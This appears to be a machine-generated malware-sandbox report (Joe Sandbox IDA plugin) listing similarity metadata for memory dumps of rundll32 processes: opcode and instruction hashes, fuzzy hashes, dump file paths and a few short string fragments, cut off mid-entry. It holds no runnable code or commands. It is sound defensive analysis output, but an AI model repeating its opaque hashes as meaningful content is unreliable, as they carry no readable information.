                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 0bd6e2c7ccfc0d98683be0d70343164b3e5bb8d5997c85e7e364eebc222909b6
                                                                                                                                                                                                                                                                            • Instruction ID: 3da349389e6cd5ffc63b3dddf586854977604a54332819a5604496b98181f126
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0bd6e2c7ccfc0d98683be0d70343164b3e5bb8d5997c85e7e364eebc222909b6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35E07D367481B04F8B1112AF342147D3BAFCAC6E6330940AFE408C3383CE16AC0B1792
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 9d3543a5f20fc65f468c7e0dd234cb708e27f0d9f62e7e5e6d992cd9eb111c27
                                                                                                                                                                                                                                                                            • Instruction ID: f2047d433a096a274b1b24a96ce77e2f53235301901a85cf3601474db8259077
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d3543a5f20fc65f468c7e0dd234cb708e27f0d9f62e7e5e6d992cd9eb111c27
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82E02636A043120BE31957349845191FFAADF423A4B08D5A6DD0886256EE30D843C780
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 7f2163ffcfd38c6e0e870ce551981352a1395d20844d9407f5fcf05aa4b87c9b
                                                                                                                                                                                                                                                                            • Instruction ID: e2de51981ac34042f4e3967de5098e0b4ebe541be2f6c067a96819a0d1635795
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f2163ffcfd38c6e0e870ce551981352a1395d20844d9407f5fcf05aa4b87c9b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8AE0125494A7D01FEB16973959B91CC7F75CC4751971840CBC0818E0A3D415A84FD25A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 91673003954e61e9abfaed92fe9982aa294b69f75516c0dae7b0ba6faf933419
                                                                                                                                                                                                                                                                            • Instruction ID: a4f8ac935cba260367a9433b5ed32e958fdf086ea19a8d5aa4ae3cf34ea30c73
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 91673003954e61e9abfaed92fe9982aa294b69f75516c0dae7b0ba6faf933419
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 51E0863124A1515FC310863CE845987FFB5EF9B75435986E6E004C7106C630E883C7D0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
Memory Dump Source
• Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: cff3eca2bb84d9720101e9765eeb5b68b24fd590ad018186bc45c07c25cd68b4
                                                                                                                                                                                                                                                                            • Instruction ID: bec09b805bf6864a541fb44d5ae1f6aae00eeca0f05282e3e06643efb1862bb1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cff3eca2bb84d9720101e9765eeb5b68b24fd590ad018186bc45c07c25cd68b4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88E09270D05288DFDB05CB74B85248D7FB5EA0220571080EAD40597252DD306E069751
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: dfa5de42f3352dcaede80efc55de432d2885127552af75e660c63387a46d2438
                                                                                                                                                                                                                                                                            • Instruction ID: c037533928801e6cfd2a47fd5fb4c8722c22f18474bea6d22875a16343babb7e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dfa5de42f3352dcaede80efc55de432d2885127552af75e660c63387a46d2438
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BBD02B3621D7185FD3059358F416455BFBCAB16125314407BEC01872A6CD206C42C3D1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 77becd2332803be27c853198849132af76048b7351c3645d45139d6fa10b5a96
                                                                                                                                                                                                                                                                            • Instruction ID: 4ec6e668b26903718599b7744a69482625b1b87a49b99d25054520b5913ccea1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 77becd2332803be27c853198849132af76048b7351c3645d45139d6fa10b5a96
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1EE02B3131030447C714775DF00455E7BDAFBC9765B40442EE54687700CE75BC068BE5
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 80ab8e710a01f21a4a341e807853a37652a74820ec02bb478dd5532955a1d7c0
                                                                                                                                                                                                                                                                            • Instruction ID: 40fbcb531fd7b26bc9c9f47b66825528a7f2e7323e4a3c19ed06fed12976327d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 80ab8e710a01f21a4a341e807853a37652a74820ec02bb478dd5532955a1d7c0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BFE0EC753042049FD314DF5DD880CD2BBE9EF592543558199E858CF712D762FD12CB90
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 3b6bed49dd73a03fac8e73b3320989ddf1e90f246ea8693e9f93b65cb87b8a5e
                                                                                                                                                                                                                                                                            • Instruction ID: a0d4c43fecb165e230c69ffd5d420e0ca07d18018e0453870553a05a88cacae6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b6bed49dd73a03fac8e73b3320989ddf1e90f246ea8693e9f93b65cb87b8a5e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6CD0A93A300134130A04229F741882EB7AFCBCAE63308806FFA0AC3340CF66AC0A17E5
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 5c98f72b28ae8441eec16eaf9887ba33348caad8e2e08a27b03c7e7df034d949
                                                                                                                                                                                                                                                                            • Instruction ID: ff68cd239c2b84ed8074031b58129254a63212325d12a472f4d5c0ea9d70bce7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c98f72b28ae8441eec16eaf9887ba33348caad8e2e08a27b03c7e7df034d949
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AAD09716F8D3502BCB0012F8281828D3FACCB42928F01C0FBED04AB242C824EC4243C5
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 2eac1d008354a173ba4e6a6ec345e858caf84d6faa874085d3ff0b79f0878958
                                                                                                                                                                                                                                                                            • Instruction ID: f6f78cb5a1f268fdad6ea5bc398aa987105423b44fe8eab71f0893a91d33d311
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2eac1d008354a173ba4e6a6ec345e858caf84d6faa874085d3ff0b79f0878958
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4AE0B674E0430CAFCB54EFF9E44459DBBF5EB48301F0081AAE809E7350EA346A458F81
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 44c92dfbf2e2c2805c20cf86791a3bff3842500d71e62e1fd99150befb898513
                                                                                                                                                                                                                                                                            • Instruction ID: 41640b0a008468d8c049c32ed9ee40352cb9bc1e9cb8d0c8512d70b210192473
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44c92dfbf2e2c2805c20cf86791a3bff3842500d71e62e1fd99150befb898513
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EFD0A73075C740CFDF58563564260AC3F65D65158530088DFD80AC3593E91AF41BA741
Memory Dump Source
• Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 19a4ec2080259494c81eda5de17dbad2c395a6f0b03155f6e8368a9c7793fbf9
                                                                                                                                                                                                                                                                            • Instruction ID: 161f4562b90d8b05f106102c128d13b5a3cf6a76e172356495d6d5e787b7ec56
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19a4ec2080259494c81eda5de17dbad2c395a6f0b03155f6e8368a9c7793fbf9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 42B0927090530CAF8620DAA9980195AB7ACDA0A211B4001D9F90887320D972AA1157D2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$,q$,q$Hq$`]q$`]q$eld
                                                                                                                                                                                                                                                                            • API String ID: 0-2326604374
                                                                                                                                                                                                                                                                            • Opcode ID: a0e21f9d293980953d77e351d65d0ee2ba3f79d26ca1ffaec65463abb74498ae
                                                                                                                                                                                                                                                                            • Instruction ID: 3e256a403505653b6419d13bdfa92d7690da509788c47a36597cb528b970b9a8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a0e21f9d293980953d77e351d65d0ee2ba3f79d26ca1ffaec65463abb74498ae
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4411831B041149FDB685B29A41456D37E7EFCA62132844AFF106DB3A0DE24FC02C7E9
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$,q$,q$eld
                                                                                                                                                                                                                                                                            • API String ID: 0-1683276628
                                                                                                                                                                                                                                                                            • Opcode ID: 454aa0fc23b2d5c18c7e7eab65e065c82e139dddf20d27ce69af017544f59b56
                                                                                                                                                                                                                                                                            • Instruction ID: b7cc1db336347a2a7d1e2cdf84438d6f0bdad5b23c8a06907cc7a3475d827db7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 454aa0fc23b2d5c18c7e7eab65e065c82e139dddf20d27ce69af017544f59b56
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28414B347002058FDB58DF69C994A6EBBB3BFC9314B258469E5169B3A5DB30EC02CB61
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$(q$Xq$eld
                                                                                                                                                                                                                                                                            • API String ID: 0-1373732196
                                                                                                                                                                                                                                                                            • Opcode ID: f68b4e6c7349c5754f196882b71dada0564eea9aab5cf1141edd1ed5c0cfbde4
                                                                                                                                                                                                                                                                            • Instruction ID: 20239e7e4f3031c05387d21300364daeb4666945e0b3b639bf5ba906387e8b94
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f68b4e6c7349c5754f196882b71dada0564eea9aab5cf1141edd1ed5c0cfbde4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 723127357087504FE325AB38D45166D7BF6EF8661071984EEE44ACB3A2DA28EC0BC7D1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000003.1456179180.0000000004330000.00000040.00000800.00020000.00000000.sdmp, Offset: 04330000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_3_4330000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: dffc89d73bd365a963100c85968073a0233af64187de071afd76834776ca7861
                                                                                                                                                                                                                                                                            • Instruction ID: 9994a42daffb233df42ebccbd7d3d3228058aae6087c0183bac2b568f26aeaed
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dffc89d73bd365a963100c85968073a0233af64187de071afd76834776ca7861
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9CB15F70E00219EFDF14CFA9C8857ADBBF2AF48315F249529D815E7294EB74A845CF41
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000003.1456179180.0000000004330000.00000040.00000800.00020000.00000000.sdmp, Offset: 04330000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_3_4330000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 85a993dab79cfa5c31051611b39c8beab9eba83de72d13854898f9f0515e5335
                                                                                                                                                                                                                                                                            • Instruction ID: fa6e785c921df654bf938f38116067675b7b0414d22c1ee8c68411f4bdf2c559
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85a993dab79cfa5c31051611b39c8beab9eba83de72d13854898f9f0515e5335
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4AB16170E00349EFDB24CFA8D88179DBBF2BF48715F149529D815EB294EB74A845CB81
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000003.1456179180.0000000004330000.00000040.00000800.00020000.00000000.sdmp, Offset: 04330000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_3_4330000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: $q$$q
                                                                                                                                                                                                                                                                            • API String ID: 0-3126353813
                                                                                                                                                                                                                                                                            • Opcode ID: 14241b6a6059a4c5212f38cff3b628ee9b1c46cf98cd866db523a766c79af807
                                                                                                                                                                                                                                                                            • Instruction ID: 88b3c8edceeb7576d80ac7f5d12edf2bcb376c8b3e1271c52c9969de595212cc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 14241b6a6059a4c5212f38cff3b628ee9b1c46cf98cd866db523a766c79af807
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A351A235B012099FDB28DF79D8506AE7BB6FFC9351B18912AE815D7364DA30AD02C7A0
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000003.1456179180.0000000004330000.00000040.00000800.00020000.00000000.sdmp, Offset: 04330000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_3_4330000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: e85b73c55b9876aed41c236949ee4e765052ec6751c780ead1dd43e412354470
                                                                                                                                                                                                                                                                            • Instruction ID: 6e6c2f84eae8478a75fbd9c9e9d24547d16c4fc5a265a7784b50177b40a84950
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e85b73c55b9876aed41c236949ee4e765052ec6751c780ead1dd43e412354470
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7210675A102149FCB48DF78D8809DEBBB2FF4C711B10816AE915EB324EB31A842CB90
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000003.1456179180.0000000004330000.00000040.00000800.00020000.00000000.sdmp, Offset: 04330000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_3_4330000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: adbdbbbd11181c3478eec5d7544e01cd763e4697184d8187fcbb46f5f9afcac6
                                                                                                                                                                                                                                                                            • Instruction ID: 2b276faaf6f7c843763677ce50d9bfb1988de5bbb87c55792d7d06591dc354a1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: adbdbbbd11181c3478eec5d7544e01cd763e4697184d8187fcbb46f5f9afcac6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B621E5B4D002098FDB20DFAAC881BDEFBB0FF49324F508529D96967240C7756946CFA1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000003.1456179180.0000000004330000.00000040.00000800.00020000.00000000.sdmp, Offset: 04330000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_3_4330000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: ed743d7560398dfa656ef2c6b1e59ad62a311e9dc64aa5d4dd7961c29ff784a8
                                                                                                                                                                                                                                                                            • Instruction ID: 5820b155d17226521f8ede745c11b0806423396791fee9b9b6067a201c9cd75c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ed743d7560398dfa656ef2c6b1e59ad62a311e9dc64aa5d4dd7961c29ff784a8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72117235B00115EFDB08DFA8E4586A9BBB2EFDC311F104459E909A7260CF356D86CB90
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000003.1456179180.0000000004330000.00000040.00000800.00020000.00000000.sdmp, Offset: 04330000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_3_4330000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: e7cf7bc5463e638eecc1963d77118f55bcc6ca6c954af2f8c878c5ae9b82b4c8
                                                                                                                                                                                                                                                                            • Instruction ID: 124548bd1a5033f62550fca6e93b340682d28fd962dc5d6bb7ead2ab6097a646
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7cf7bc5463e638eecc1963d77118f55bcc6ca6c954af2f8c878c5ae9b82b4c8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F511F4B4D002098FDB20DFAAC881BAEFBF4FF48324F508529D95967240CB796905CFA5
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000003.1456179180.0000000004330000.00000040.00000800.00020000.00000000.sdmp, Offset: 04330000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_3_4330000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 0cdb375cd871b091661567c1d8a4ec665a8d823b4fcf12168a722c231d44dafc
                                                                                                                                                                                                                                                                            • Instruction ID: 9a99cdfa0bbfcd3622d8dfc8ea32b5f752664e13fa5bc8a0f824b11b656eee5e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cdb375cd871b091661567c1d8a4ec665a8d823b4fcf12168a722c231d44dafc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C01D235B042148F9B54EF7890202BFBBE69FC9306B1414A9D449C7350EF30DA038B92
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000003.1456179180.0000000004330000.00000040.00000800.00020000.00000000.sdmp, Offset: 04330000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_3_4330000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 13f9c07926fd5fb78466f9bf828a8f32000b6711dffe4f53ef21e202328a446f
                                                                                                                                                                                                                                                                            • Instruction ID: d2ddf3813f96faa7776bf6bc7f2ed6be5122adf9319641545cb194198c536978
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 13f9c07926fd5fb78466f9bf828a8f32000b6711dffe4f53ef21e202328a446f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF115431B00215BFDB08DF98E458AA9BBB6EFDC321F144059E409A7360CF795D85CB90
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000003.1456179180.0000000004330000.00000040.00000800.00020000.00000000.sdmp, Offset: 04330000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_3_4330000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 0c579cc21d7dddf58fa7f5ebad4812cfc347b38eea6bd46b4d8edf1af787c247
                                                                                                                                                                                                                                                                            • Instruction ID: dcc67d9e6ae70fa7646e98d811e7d4681518ccdbd597216e8ada7574e11db5c3
